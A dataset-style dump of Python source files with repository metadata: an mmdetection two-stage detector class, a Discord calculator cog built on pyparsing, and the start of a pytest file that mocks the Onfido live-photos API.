                 mask_roi_extractor=None,
                 mask_head=None,
                 train_cfg=None,
                 test_cfg=None,
                 pretrained=None):
        super(TwoStageDetector, self).__init__()
        self.backbone = builder.build_backbone(backbone)
        if neck is not None:
            self.neck = builder.build_neck(neck)
        if shared_head is not None:
            self.shared_head = builder.build_shared_head(shared_head)
        if rpn_head is not None:
            self.rpn_head = builder.build_head(rpn_head)
        if bbox_head is not None:
            self.bbox_roi_extractor = builder.build_roi_extractor(
                bbox_roi_extractor)
            self.bbox_head = builder.build_head(bbox_head)
        if mask_head is not None:
            if mask_roi_extractor is not None:
                self.mask_roi_extractor = builder.build_roi_extractor(
                    mask_roi_extractor)
                self.share_roi_extractor = False
            else:
                # No dedicated mask extractor configured: reuse the bbox
                # RoI extractor (and its pooled features at train time).
                self.share_roi_extractor = True
                self.mask_roi_extractor = self.bbox_roi_extractor
            self.mask_head = builder.build_head(mask_head)
        self.train_cfg = train_cfg
        self.test_cfg = test_cfg
        self.init_weights(pretrained=pretrained)

    @property
    def with_rpn(self):
        """bool: whether this detector has an RPN head."""
        return hasattr(self, 'rpn_head') and self.rpn_head is not None

    def init_weights(self, pretrained=None):
        """Initialize the weights of every submodule, optionally from *pretrained*."""
        super(TwoStageDetector, self).init_weights(pretrained)
        self.backbone.init_weights(pretrained=pretrained)
        if self.with_neck:
            if isinstance(self.neck, nn.Sequential):
                for m in self.neck:
                    m.init_weights()
            else:
                self.neck.init_weights()
        if self.with_shared_head:
            self.shared_head.init_weights(pretrained=pretrained)
        if self.with_rpn:
            self.rpn_head.init_weights()
        if self.with_bbox:
            self.bbox_roi_extractor.init_weights()
            self.bbox_head.init_weights()
        if self.with_mask:
            self.mask_head.init_weights()
            if not self.share_roi_extractor:
                self.mask_roi_extractor.init_weights()

    def extract_feat(self, img):
        """Extract backbone (and neck, if present) feature maps from *img*."""
        x = self.backbone(img)
        if self.with_neck:
            x = self.neck(x)
        return x

    def forward_train(self,
                      img,
                      img_meta,
                      gt_bboxes,
                      gt_labels,
                      gt_bboxes_ignore=None,
                      gt_masks=None,
                      proposals=None):
        """Run one training forward pass and return a dict of named losses.

        When *proposals* is given the RPN is bypassed; otherwise RPN losses
        are computed and proposals are generated from the RPN outputs.
        """
        x = self.extract_feat(img)
        losses = dict()
        # RPN forward and loss
        if self.with_rpn:
            rpn_outs = self.rpn_head(x)
            rpn_loss_inputs = rpn_outs + (gt_bboxes, img_meta,
                                          self.train_cfg.rpn)
            rpn_losses = self.rpn_head.loss(
                *rpn_loss_inputs, gt_bboxes_ignore=gt_bboxes_ignore)
            losses.update(rpn_losses)
            proposal_cfg = self.train_cfg.get('rpn_proposal',
                                              self.test_cfg.rpn)
            proposal_inputs = rpn_outs + (img_meta, proposal_cfg)
            proposal_list = self.rpn_head.get_bboxes(*proposal_inputs)
        else:
            proposal_list = proposals
        # assign gts and sample proposals
        if self.with_bbox or self.with_mask:
            bbox_assigner = build_assigner(self.train_cfg.rcnn.assigner)
            bbox_sampler = build_sampler(
                self.train_cfg.rcnn.sampler, context=self)
            num_imgs = img.size(0)
            if gt_bboxes_ignore is None:
                gt_bboxes_ignore = [None for _ in range(num_imgs)]
            sampling_results = []
            for i in range(num_imgs):
                assign_result = bbox_assigner.assign(proposal_list[i],
                                                     gt_bboxes[i],
                                                     gt_bboxes_ignore[i],
                                                     gt_labels[i])
                sampling_result = bbox_sampler.sample(
                    assign_result,
                    proposal_list[i],
                    gt_bboxes[i],
                    gt_labels[i],
                    feats=[lvl_feat[i][None] for lvl_feat in x])
                sampling_results.append(sampling_result)
        # bbox head forward and loss
        if self.with_bbox:
            rois = bbox2roi([res.bboxes for res in sampling_results])
            # TODO: a more flexible way to decide which feature maps to use
            bbox_feats = self.bbox_roi_extractor(
                x[:self.bbox_roi_extractor.num_inputs], rois)
            if self.with_shared_head:
                bbox_feats = self.shared_head(bbox_feats)
            cls_score, bbox_pred = self.bbox_head(bbox_feats)
            bbox_targets = self.bbox_head.get_target(sampling_results,
                                                     gt_bboxes, gt_labels,
                                                     self.train_cfg.rcnn)
            loss_bbox = self.bbox_head.loss(cls_score, bbox_pred,
                                            *bbox_targets)
            losses.update(loss_bbox)
        # mask head forward and loss
        if self.with_mask:
            if not self.share_roi_extractor:
                pos_rois = bbox2roi(
                    [res.pos_bboxes for res in sampling_results])
                mask_feats = self.mask_roi_extractor(
                    x[:self.mask_roi_extractor.num_inputs], pos_rois)
                if self.with_shared_head:
                    mask_feats = self.shared_head(mask_feats)
            else:
                # Shared extractor: reuse the already-pooled bbox_feats and
                # select only the positive samples with a boolean index.
                pos_inds = []
                device = bbox_feats.device
                for res in sampling_results:
                    pos_inds.append(
                        torch.ones(
                            res.pos_bboxes.shape[0],
                            device=device,
                            dtype=torch.uint8))
                    pos_inds.append(
                        torch.zeros(
                            res.neg_bboxes.shape[0],
                            device=device,
                            dtype=torch.uint8))
                pos_inds = torch.cat(pos_inds)
                mask_feats = bbox_feats[pos_inds]
            mask_pred = self.mask_head(mask_feats)
            mask_targets = self.mask_head.get_target(sampling_results,
                                                     gt_masks,
                                                     self.train_cfg.rcnn)
            pos_labels = torch.cat(
                [res.pos_gt_labels for res in sampling_results])
            loss_mask = self.mask_head.loss(mask_pred, mask_targets,
                                            pos_labels)
            losses.update(loss_mask)
        return losses

    def simple_test(self, img, img_meta, proposals=None, rescale=False):
        """Test without augmentation."""
        assert self.with_bbox, "Bbox head must be implemented."
        x = self.extract_feat(img)
        proposal_list = self.simple_test_rpn(
            x, img_meta, self.test_cfg.rpn) if proposals is None else proposals
        det_bboxes, det_labels = self.simple_test_bboxes(
            x, img_meta, proposal_list, self.test_cfg.rcnn, rescale=rescale)
        bbox_results = bbox2result(det_bboxes, det_labels,
                                   self.bbox_head.num_classes)
        if not self.with_mask:
            return bbox_results
        else:
            segm_results = self.simple_test_mask(
                x, img_meta, det_bboxes, det_labels, rescale=rescale)
            return bbox_results, segm_results

    def aug_test(self, imgs, img_metas, rescale=False):
        """Test with augmentations.

        If rescale is False, then returned bboxes and masks will fit the scale
        of imgs[0].
        """
        # recompute feats to save memory
        proposal_list = self.aug_test_rpn(
            self.extract_feats(imgs), img_metas, self.test_cfg.rpn)
        det_bboxes, det_labels = self.aug_test_bboxes(
            self.extract_feats(imgs), img_metas, proposal_list,
            self.test_cfg.rcnn)
        if rescale:
            _det_bboxes = det_bboxes
        else:
            # Scale boxes back to the first image's original scale for output.
            _det_bboxes = det_bboxes.clone()
            _det_bboxes[:, :4] *= img_metas[0][0]['scale_factor']
        bbox_results = bbox2result(_det_bboxes, det_labels,
                                   self.bbox_head.num_classes)
        # det_bboxes always keep the original scale
        if self.with_mask:
            segm_results = self.aug_test_mask(
                self.extract_feats(imgs), img_metas, det_bboxes, det_labels)
            return bbox_results, segm_results
        else:
            return bbox_results
| 39.282787
| 79
| 0.549609
|
import torch
import torch.nn as nn
from .base import BaseDetector
from .test_mixins import RPNTestMixin, BBoxTestMixin, MaskTestMixin
from .. import builder
from ..registry import DETECTORS
from mmdet.core import bbox2roi, bbox2result, build_assigner, build_sampler
@DETECTORS.register_module
class TwoStageDetector(BaseDetector, RPNTestMixin, BBoxTestMixin,
                       MaskTestMixin):
    """Two-stage detector (Faster/Mask R-CNN style).

    Pipeline: backbone -> optional neck -> RPN proposals -> RoI bbox head
    -> optional mask head.  Every sub-module is built from its config dict
    via ``builder``; heads are optional so the same class covers RPN-only,
    bbox-only and bbox+mask configurations.
    """

    def __init__(self,
                 backbone,
                 neck=None,
                 shared_head=None,
                 rpn_head=None,
                 bbox_roi_extractor=None,
                 bbox_head=None,
                 mask_roi_extractor=None,
                 mask_head=None,
                 train_cfg=None,
                 test_cfg=None,
                 pretrained=None):
        super(TwoStageDetector, self).__init__()
        self.backbone = builder.build_backbone(backbone)
        if neck is not None:
            self.neck = builder.build_neck(neck)
        if shared_head is not None:
            self.shared_head = builder.build_shared_head(shared_head)
        if rpn_head is not None:
            self.rpn_head = builder.build_head(rpn_head)
        if bbox_head is not None:
            self.bbox_roi_extractor = builder.build_roi_extractor(
                bbox_roi_extractor)
            self.bbox_head = builder.build_head(bbox_head)
        if mask_head is not None:
            # Without a dedicated mask RoI extractor the mask head reuses
            # the bbox head's RoI features (share_roi_extractor=True).
            if mask_roi_extractor is not None:
                self.mask_roi_extractor = builder.build_roi_extractor(
                    mask_roi_extractor)
                self.share_roi_extractor = False
            else:
                self.share_roi_extractor = True
                self.mask_roi_extractor = self.bbox_roi_extractor
            self.mask_head = builder.build_head(mask_head)
        self.train_cfg = train_cfg
        self.test_cfg = test_cfg
        self.init_weights(pretrained=pretrained)

    @property
    def with_rpn(self):
        # True when an RPN head was configured (proposals are generated
        # internally rather than supplied by the caller).
        return hasattr(self, 'rpn_head') and self.rpn_head is not None

    def init_weights(self, pretrained=None):
        """Initialize weights of every configured sub-module.

        Args:
            pretrained (str, optional): path/URL of pretrained weights,
                forwarded to the backbone and shared head.
        """
        super(TwoStageDetector, self).init_weights(pretrained)
        self.backbone.init_weights(pretrained=pretrained)
        if self.with_neck:
            # The neck may be a single module or an nn.Sequential of them.
            if isinstance(self.neck, nn.Sequential):
                for m in self.neck:
                    m.init_weights()
            else:
                self.neck.init_weights()
        if self.with_shared_head:
            self.shared_head.init_weights(pretrained=pretrained)
        if self.with_rpn:
            self.rpn_head.init_weights()
        if self.with_bbox:
            self.bbox_roi_extractor.init_weights()
            self.bbox_head.init_weights()
        if self.with_mask:
            self.mask_head.init_weights()
            if not self.share_roi_extractor:
                self.mask_roi_extractor.init_weights()

    def extract_feat(self, img):
        """Run the backbone (and neck, if any) and return feature maps."""
        x = self.backbone(img)
        if self.with_neck:
            x = self.neck(x)
        return x

    def forward_train(self,
                      img,
                      img_meta,
                      gt_bboxes,
                      gt_labels,
                      gt_bboxes_ignore=None,
                      gt_masks=None,
                      proposals=None):
        """Training forward pass; returns a dict of named losses.

        ``proposals`` bypasses the RPN when given (e.g. precomputed
        proposals).  RPN, bbox and mask losses are merged into one dict.
        """
        x = self.extract_feat(img)

        losses = dict()

        # RPN forward + loss, then decode proposals for the RoI heads.
        if self.with_rpn:
            rpn_outs = self.rpn_head(x)
            rpn_loss_inputs = rpn_outs + (gt_bboxes, img_meta,
                                          self.train_cfg.rpn)
            rpn_losses = self.rpn_head.loss(
                *rpn_loss_inputs, gt_bboxes_ignore=gt_bboxes_ignore)
            losses.update(rpn_losses)

            proposal_cfg = self.train_cfg.get('rpn_proposal',
                                              self.test_cfg.rpn)
            proposal_inputs = rpn_outs + (img_meta, proposal_cfg)
            proposal_list = self.rpn_head.get_bboxes(*proposal_inputs)
        else:
            proposal_list = proposals

        # Assign ground truth to proposals and sample pos/neg RoIs per image.
        if self.with_bbox or self.with_mask:
            bbox_assigner = build_assigner(self.train_cfg.rcnn.assigner)
            bbox_sampler = build_sampler(
                self.train_cfg.rcnn.sampler, context=self)
            num_imgs = img.size(0)
            if gt_bboxes_ignore is None:
                gt_bboxes_ignore = [None for _ in range(num_imgs)]
            sampling_results = []
            for i in range(num_imgs):
                assign_result = bbox_assigner.assign(proposal_list[i],
                                                     gt_bboxes[i],
                                                     gt_bboxes_ignore[i],
                                                     gt_labels[i])
                sampling_result = bbox_sampler.sample(
                    assign_result,
                    proposal_list[i],
                    gt_bboxes[i],
                    gt_labels[i],
                    feats=[lvl_feat[i][None] for lvl_feat in x])
                sampling_results.append(sampling_result)

        # Bbox head: RoI feature extraction, classification + regression loss.
        if self.with_bbox:
            rois = bbox2roi([res.bboxes for res in sampling_results])
            bbox_feats = self.bbox_roi_extractor(
                x[:self.bbox_roi_extractor.num_inputs], rois)
            if self.with_shared_head:
                bbox_feats = self.shared_head(bbox_feats)
            cls_score, bbox_pred = self.bbox_head(bbox_feats)

            bbox_targets = self.bbox_head.get_target(sampling_results,
                                                     gt_bboxes, gt_labels,
                                                     self.train_cfg.rcnn)
            loss_bbox = self.bbox_head.loss(cls_score, bbox_pred,
                                            *bbox_targets)
            losses.update(loss_bbox)

        # Mask head: only positive RoIs contribute to the mask loss.
        if self.with_mask:
            if not self.share_roi_extractor:
                pos_rois = bbox2roi(
                    [res.pos_bboxes for res in sampling_results])
                mask_feats = self.mask_roi_extractor(
                    x[:self.mask_roi_extractor.num_inputs], pos_rois)
                if self.with_shared_head:
                    mask_feats = self.shared_head(mask_feats)
            else:
                # Reuse bbox_feats: build a boolean index selecting the
                # positive samples (ones for pos, zeros for neg, per image).
                pos_inds = []
                device = bbox_feats.device
                for res in sampling_results:
                    pos_inds.append(
                        torch.ones(
                            res.pos_bboxes.shape[0],
                            device=device,
                            dtype=torch.uint8))
                    pos_inds.append(
                        torch.zeros(
                            res.neg_bboxes.shape[0],
                            device=device,
                            dtype=torch.uint8))
                pos_inds = torch.cat(pos_inds)
                mask_feats = bbox_feats[pos_inds]
            mask_pred = self.mask_head(mask_feats)

            mask_targets = self.mask_head.get_target(sampling_results,
                                                     gt_masks,
                                                     self.train_cfg.rcnn)
            pos_labels = torch.cat(
                [res.pos_gt_labels for res in sampling_results])
            loss_mask = self.mask_head.loss(mask_pred, mask_targets,
                                            pos_labels)
            losses.update(loss_mask)

        return losses

    def simple_test(self, img, img_meta, proposals=None, rescale=False):
        """Single-image (no augmentation) test; returns bbox (and mask)
        results in the mmdet per-class list format."""
        assert self.with_bbox, "Bbox head must be implemented."
        x = self.extract_feat(img)
        proposal_list = self.simple_test_rpn(
            x, img_meta, self.test_cfg.rpn) if proposals is None else proposals
        det_bboxes, det_labels = self.simple_test_bboxes(
            x, img_meta, proposal_list, self.test_cfg.rcnn, rescale=rescale)
        bbox_results = bbox2result(det_bboxes, det_labels,
                                   self.bbox_head.num_classes)
        if not self.with_mask:
            return bbox_results
        else:
            segm_results = self.simple_test_mask(
                x, img_meta, det_bboxes, det_labels, rescale=rescale)
            return bbox_results, segm_results

    def aug_test(self, imgs, img_metas, rescale=False):
        """Test-time-augmentation path: proposals and boxes are merged
        across augmented views; boxes are in original image scale unless
        ``rescale`` is False (then scaled back to the augmented scale)."""
        # recompute feats to save memory
        proposal_list = self.aug_test_rpn(
            self.extract_feats(imgs), img_metas, self.test_cfg.rpn)
        det_bboxes, det_labels = self.aug_test_bboxes(
            self.extract_feats(imgs), img_metas, proposal_list,
            self.test_cfg.rcnn)

        if rescale:
            _det_bboxes = det_bboxes
        else:
            _det_bboxes = det_bboxes.clone()
            _det_bboxes[:, :4] *= img_metas[0][0]['scale_factor']
        bbox_results = bbox2result(_det_bboxes, det_labels,
                                   self.bbox_head.num_classes)

        # det_bboxes always keep the original scale for the mask branch.
        if self.with_mask:
            segm_results = self.aug_test_mask(
                self.extract_feats(imgs), img_metas, det_bboxes, det_labels)
            return bbox_results, segm_results
        else:
            return bbox_results
| true
| true
|
f705116959898fd81eae2168f0c9e139ab6337b3
| 7,603
|
py
|
Python
|
cogs/calculator.py
|
MerciDvor/modbot
|
f1a11eaa8e88d297ee19ca37aacc41489c0d0350
|
[
"MIT"
] | 11
|
2019-01-10T22:09:31.000Z
|
2021-12-14T05:26:10.000Z
|
cogs/calculator.py
|
MerciDvor/modbot
|
f1a11eaa8e88d297ee19ca37aacc41489c0d0350
|
[
"MIT"
] | 5
|
2019-01-10T07:20:19.000Z
|
2021-04-22T00:57:34.000Z
|
cogs/calculator.py
|
MerciDvor/modbot
|
f1a11eaa8e88d297ee19ca37aacc41489c0d0350
|
[
"MIT"
] | 34
|
2019-01-10T05:49:29.000Z
|
2022-02-11T14:04:54.000Z
|
from __future__ import division
import discord, math, operator
from discord.ext import commands
from pyparsing import (Literal,CaselessLiteral,Word,Combine,Group,Optional,
ZeroOrMore,Forward,nums,alphas,oneOf)
__author__='Paul McGuire'
__version__ = '$Revision: 0.0 $'
__date__ = '$Date: 2009-03-20 $'
__source__ = """http://pyparsing.wikispaces.com/file/view/fourFn.py
http://pyparsing.wikispaces.com/message/view/home/15549426
"""
__note__ = """
This is a re-wrap of Paul McGuire's fourFn.py as a class, so it can
be used easily in other places of the code. Most of the work wad done
by corpnewt, all I did was clean it and create the results in embeds.
Also, the messages are deleted after, except for the correct answer.
"""
class NumericStringParserForPython3(object):
    """
    Four-function (plus functions/constants) arithmetic parser.

    Most of this code comes from the fourFn.py pyparsing example.

    Bug fix vs. the original: the ``sgn`` entry called Python 2's
    ``cmp()``, which does not exist in Python 3 and raised NameError
    whenever ``sgn(...)`` appeared in a formula.  It now computes the
    sign directly.
    """

    def pushFirst(self, strg, loc, toks):
        # pyparsing parse action: push the matched token onto the RPN stack.
        self.exprStack.append(toks[0])

    def pushUMinus(self, strg, loc, toks):
        # pyparsing parse action: record a unary minus marker.
        if toks and toks[0] == '-':
            self.exprStack.append('unary -')

    def __init__(self):
        """
        Build the grammar.  Supported symbols:
        expop   :: '^'
        multop  :: '*' | '/'
        addop   :: '+' | '-'
        integer :: ['+' | '-'] '0'..'9'+
        """
        point = Literal(".")
        e = CaselessLiteral("E")
        fnumber = Combine(Word("+-"+nums, nums) +
                          Optional(point + Optional(Word(nums))) +
                          Optional(e + Word("+-"+nums, nums)))
        ident = Word(alphas, alphas+nums+"_$")
        plus = Literal("+")
        minus = Literal("-")
        mult = Literal("*")
        div = Literal("/")
        lpar = Literal("(").suppress()
        rpar = Literal(")").suppress()
        addop = plus | minus
        multop = mult | div
        expop = Literal("^")
        pi = CaselessLiteral("PI")
        expr = Forward()
        atom = ((Optional(oneOf("- +")) +
                 (pi|e|fnumber|ident+lpar+expr+rpar).setParseAction(self.pushFirst))
                | Optional(oneOf("- +")) + Group(lpar+expr+rpar)
                ).setParseAction(self.pushUMinus)
        # by defining exponentiation as "atom [ ^ factor ]..." instead of
        # "atom [ ^ atom ]...", we get right-to-left exponents, instead of
        # left-to-right; that is, 2^3^2 = 2^(3^2), not (2^3)^2.
        factor = Forward()
        factor << atom + ZeroOrMore((expop + factor).setParseAction(self.pushFirst))
        term = factor + ZeroOrMore((multop + factor).setParseAction(self.pushFirst))
        expr << term + ZeroOrMore((addop + term).setParseAction(self.pushFirst))
        self.bnf = expr
        # map operator symbols to their corresponding arithmetic operations
        epsilon = 1e-12
        self.opn = {
            "+": operator.add,
            "-": operator.sub,
            "*": operator.mul,
            "/": operator.truediv,
            "^": operator.pow}
        self.fn = {
            "sin": math.sin,
            "cos": math.cos,
            "tan": math.tan,
            "abs": abs,
            "trunc": lambda a: int(a),
            "round": round,
            # Python 3 fix: (a > 0) - (a < 0) replaces the removed cmp(a, 0).
            "sgn": lambda a: ((a > 0) - (a < 0)) if abs(a) > epsilon else 0}

    def evaluateStack(self, s):
        """Recursively pop the RPN stack *s* and return its numeric value."""
        op = s.pop()
        if op == 'unary -':
            return -self.evaluateStack(s)
        if op in "+-*/^":
            op2 = self.evaluateStack(s)
            op1 = self.evaluateStack(s)
            return self.opn[op](op1, op2)
        elif op == "PI":
            return math.pi  # 3.1415926535
        elif op == "E":
            return math.e  # 2.718281828
        elif op in self.fn:
            return self.fn[op](self.evaluateStack(s))
        elif op[0].isalpha():
            # Unknown identifiers evaluate to 0 (fourFn.py behavior).
            return 0
        else:
            return float(op)

    def eval(self, num_string, parseAll=True):
        """Parse *num_string* with the grammar and return the result."""
        self.exprStack = []
        self.bnf.parseString(num_string, parseAll)
        val = self.evaluateStack(self.exprStack[:])
        return val
class Calculator:
    """Discord cog exposing a scientific-calculator command."""

    # Init with the bot reference, and a reference to the settings var
    def __init__(self, bot):
        self.bot = bot
        self.nsp = NumericStringParserForPython3()
        self.user_color = discord.Colour(0xed791d)  ## orange
        self.mod_color = discord.Colour(0x7289da)  ## blurple

    @commands.command(description='Scientific calculator', aliases=['calculate', 'maths'])
    async def calc(self, ctx, *, formula = None):
        """ ✔ Do some math
        thanks to Paul McGuire's fourFn.py. """
        person = ctx.message.author

        # Bug fix: check for a missing formula *before* touching it.  The
        # original called formula.replace(...) first, so invoking the
        # command without arguments raised AttributeError on None and the
        # usage-help branch below was unreachable.
        if formula is None:
            # How can it calculate an empty message? Reee!
            msg = f'\u200BUsage: `{ctx.prefix}{ctx.invoked_with} [any maths formula]`'
            e = discord.Embed(color=self.user_color)
            e.description = msg
            try:
                await ctx.send(embed=e, delete_after=23)
            except discord.HTTPException:
                await ctx.send(msg, delete_after=23)
            return

        # Normalize natural-language and unicode operators to parser symbols.
        formula = formula.replace('x', '*').replace(' minus ', '-').replace(' plus ', '+').replace(' into ', '/') \
            .replace(' sub ', '-').replace(' pi ', 'PI').replace(' divide ', '/').replace(' multiply ', '*') \
            .replace(' add ', '+').replace(' div ', '/').replace(' multi ', '*').replace(' mul ', '*') \
            .replace('π', 'PI').replace('÷', '/')

        try:
            answer = self.nsp.eval(formula)
        except Exception:
            # If there's a problem in the input, show examples
            msg = f'\N{THINKING FACE} wrong `{formula}` input.\n\nTry any of these:'
            e = discord.Embed(color=self.user_color)
            e.description = f'\u200B{msg}'
            e.add_field(name='multiply', value='`2 * 3 x 5 multiply 7`')
            e.add_field(name='divide', value='`91 / 5 divide 3 into 2 ÷ 4`')
            e.add_field(name='add', value='`1 + 4 plus 8 add 23`')
            e.add_field(name='substract', value='`91 - 35 minus 3 sub 12`')
            e.add_field(name='exponential', value="`7 ^ 5`")
            e.add_field(name='Supported formulas',
                        value='```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```')
            try:
                await ctx.send(embed=e, delete_after=23)
            except discord.HTTPException:
                error = f'\N{THINKING FACE} wrong `{formula}` input.\n\n ' \
                        f'Try any of these:```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```'
                await ctx.send(error, delete_after=23)
            return

        # Correct input prints correct answer.
        # (The original `self.bot or self.bot.message` always yielded
        # self.bot, since a bot instance is truthy — simplified.)
        duration = f'Calculated in {self.bot.ws.latency * 1000:.2f} ms'
        success = round(answer, 2)

        e = discord.Embed(color=self.user_color)
        e.add_field(name='Input:', value=f'```py\n{formula}```', inline=True)
        e.add_field(name='Result:', value=f'```css\n{success}```', inline=True)
        e.set_footer(text=duration)
        try:
            await ctx.send(embed=e)
        except discord.Forbidden:  # FORBIDDEN (status code: 403): Missing Permissions
            await ctx.send(f'```rust\n>Input: {formula}\nResult: {success}```')
def setup(bot):
    # discord.py extension entry point: register the cog when loaded.
    bot.add_cog(Calculator(bot))
| 41.320652
| 123
| 0.544916
|
from __future__ import division
import discord, math, operator
from discord.ext import commands
from pyparsing import (Literal,CaselessLiteral,Word,Combine,Group,Optional,
ZeroOrMore,Forward,nums,alphas,oneOf)
__author__='Paul McGuire'
__version__ = '$Revision: 0.0 $'
__date__ = '$Date: 2009-03-20 $'
__source__ = """http://pyparsing.wikispaces.com/file/view/fourFn.py
http://pyparsing.wikispaces.com/message/view/home/15549426
"""
__note__ = """
This is a re-wrap of Paul McGuire's fourFn.py as a class, so it can
be used easily in other places of the code. Most of the work wad done
by corpnewt, all I did was clean it and create the results in embeds.
Also, the messages are deleted after, except for the correct answer.
"""
class NumericStringParserForPython3(object):
def pushFirst(self, strg, loc, toks):
self.exprStack.append(toks[0])
def pushUMinus(self, strg, loc, toks):
if toks and toks[0]=='-':
self.exprStack.append('unary -')
def __init__(self):
point = Literal(".")
e = CaselessLiteral("E")
fnumber = Combine(Word("+-"+nums, nums) +
Optional(point + Optional(Word(nums))) +
Optional(e + Word("+-"+nums, nums)))
ident = Word(alphas, alphas+nums+"_$")
plus = Literal("+")
minus = Literal("-")
mult = Literal("*")
div = Literal("/")
lpar = Literal("(").suppress()
rpar = Literal(")").suppress()
addop = plus | minus
multop = mult | div
expop = Literal("^")
pi = CaselessLiteral("PI")
expr = Forward()
atom = ((Optional(oneOf("- +")) +
(pi|e|fnumber|ident+lpar+expr+rpar).setParseAction(self.pushFirst))
| Optional(oneOf("- +")) + Group(lpar+expr+rpar)
).setParseAction(self.pushUMinus)
# by defining exponentiation as "atom [ ^ factor ]..." instead of
# "atom [ ^ atom ]...", we get right-to-left exponents, instead of left-to-right
# that is, 2^3^2 = 2^(3^2), not (2^3)^2.
factor = Forward()
factor << atom + ZeroOrMore((expop + factor).setParseAction(self.pushFirst))
term = factor + ZeroOrMore((multop + factor).setParseAction(self.pushFirst))
expr << term + ZeroOrMore((addop + term).setParseAction(self.pushFirst))
# addop_term = (addop + term).setParseAction(self.pushFirst)
# general_term = term + ZeroOrMore(addop_term) | OneOrMore(addop_term)
# expr << general_term
self.bnf = expr
# this will map operator symbols to their corresponding arithmetic operations
epsilon = 1e-12
self.opn = {
"+" : operator.add,
"-" : operator.sub,
"*" : operator.mul,
"/" : operator.truediv,
"^" : operator.pow }
self.fn = {
"sin" : math.sin,
"cos" : math.cos,
"tan" : math.tan,
"abs" : abs,
"trunc" : lambda a: int(a),
"round" : round,
"sgn" : lambda a: abs(a)>epsilon and cmp(a,0) or 0}
def evaluateStack(self, s):
op = s.pop()
if op == 'unary -':
return -self.evaluateStack(s)
if op in "+-*/^":
op2 = self.evaluateStack(s)
op1 = self.evaluateStack(s)
return self.opn[op](op1, op2)
elif op == "PI":
return math.pi # 3.1415926535
elif op == "E":
return math.e # 2.718281828
elif op in self.fn:
return self.fn[op](self.evaluateStack(s))
elif op[0].isalpha():
return 0
else:
return float(op)
def eval(self,num_string,parseAll=True):
self.exprStack=[]
results=self.bnf.parseString(num_string,parseAll)
val=self.evaluateStack(self.exprStack[:])
return val
class Calculator:
# Init with the bot reference, and a reference to the settings var
def __init__(self, bot):
self.bot = bot
self.nsp=NumericStringParserForPython3()
self.user_color = discord.Colour(0xed791d) ## orange
self.mod_color = discord.Colour(0x7289da) ## blurple
@commands.command(description='Scientific calculator', aliases=['calculate', 'maths'])
async def calc(self, ctx, *, formula = None):
person = ctx.message.author
formula = formula.replace('x', '*').replace(' minus ', '-').replace(' plus ', '+').replace(' into ', '/') \
.replace(' sub ', '-').replace(' pi ', 'PI').replace(' divide ', '/').replace(' multiply ', '*') \
.replace(' add ', '+').replace(' div ', '/').replace(' multi ', '*').replace(' mul ', '*') \
.replace('π', 'PI').replace('÷', '/')
if formula == None:
# How can it calculate an empty message? Reee!
msg = f'\u200BUsage: `{ctx.prefix}{ctx.invoked_with} [any maths formula]`'
e = discord.Embed(color=self.user_color)
e.description = msg
try:
await ctx.send(embed=e, delete_after=23)
except discord.HTTPException:
await ctx.send(msg, delete_after=23)
return
try:
answer=self.nsp.eval(formula)
except:
# If there's a problem in the input, show examples
msg = f'\N{THINKING FACE} wrong `{formula}` input.\n\nTry any of these:'
e = discord.Embed(color=self.user_color)
e.description = f'\u200B{msg}'
e.add_field(name='multiply', value='`2 * 3 x 5 multiply 7`')
e.add_field(name='divide', value='`91 / 5 divide 3 into 2 ÷ 4`')
e.add_field(name='add', value='`1 + 4 plus 8 add 23`')
e.add_field(name='substract', value='`91 - 35 minus 3 sub 12`')
e.add_field(name='exponential', value="`7 ^ 5`")
e.add_field(name='Supported formulas',
value='```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```')
try:
await ctx.send(embed=e, delete_after=23)
except discord.HTTPException:
error = f'\N{THINKING FACE} wrong `{formula}` input.\n\n ' \
f'Try any of these:```py\nround((cos(45) + (3+7^2)*2 + tan(369.18)) / π - 3)```'
await ctx.send(error, delete_after=23)
return
distance = self.bot or self.bot.message
duration = f'Calculated in {distance.ws.latency * 1000:.2f} ms'
success = round(answer, 2)
e = discord.Embed(color=self.user_color)
e.add_field(name='Input:', value=f'```py\n{formula}```', inline=True)
e.add_field(name='Result:', value=f'```css\n{success}```', inline=True)
e.set_footer(text=duration)
try:
await ctx.send(embed=e)
except discord.Forbidden:
await ctx.send(f'```rust\n>Input: {formula}\nResult: {success}```')
def setup(bot):
bot.add_cog(Calculator(bot))
| true
| true
|
f7051188a962d569b2fe5523b4fb6cc5f81e0849
| 1,304
|
py
|
Python
|
tests/test_live_photos.py
|
onfido/onfido-python
|
e779347f04dd7891987c2c915047fd039f6d7742
|
[
"MIT"
] | 16
|
2020-06-30T15:35:42.000Z
|
2022-02-12T09:26:41.000Z
|
tests/test_live_photos.py
|
onfido/onfido-python
|
e779347f04dd7891987c2c915047fd039f6d7742
|
[
"MIT"
] | 6
|
2020-07-06T08:56:33.000Z
|
2021-07-12T18:09:07.000Z
|
tests/test_live_photos.py
|
onfido/onfido-python
|
e779347f04dd7891987c2c915047fd039f6d7742
|
[
"MIT"
] | 5
|
2020-08-18T08:12:19.000Z
|
2021-05-26T11:43:53.000Z
|
import onfido
from onfido.regions import Region
import io
api = onfido.Api("<AN_API_TOKEN>", region=Region.EU)
fake_uuid = "58a9c6d2-8661-4dbd-96dc-b9b9d344a7ce"
def test_upload_photo(requests_mock):
    """Uploading a live photo should POST to the live_photos endpoint."""
    mock_upload = requests_mock.post("https://api.eu.onfido.com/v3.2/live_photos/", json=[])
    request_body = {"advanced_validation": "true"}
    # Fix: open the sample file in a context manager so the handle is
    # always closed (the original leaked it and triggered ResourceWarning).
    with open("sample_photo.png", "rb") as sample_file:
        api.live_photo.upload(sample_file, request_body)
    assert mock_upload.called is True
def test_find_live_photo(requests_mock):
    """Finding a live photo should GET the single-photo resource."""
    expected_url = f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}"
    find_endpoint = requests_mock.get(expected_url, json=[])
    api.live_photo.find(fake_uuid)
    assert find_endpoint.called is True
def test_list_live_photos(requests_mock):
    """Listing live photos should GET with the applicant id as query param."""
    list_url = f"https://api.eu.onfido.com/v3.2/live_photos/?applicant_id={fake_uuid}"
    list_endpoint = requests_mock.get(list_url, json=[])
    api.live_photo.all(fake_uuid)
    assert list_endpoint.called is True
def test_download_live_photo(requests_mock):
    """Downloading should GET the binary and surface its content type."""
    download_url = f"https://api.eu.onfido.com/v3.2/live_photos/{fake_uuid}/download"
    download_endpoint = requests_mock.get(
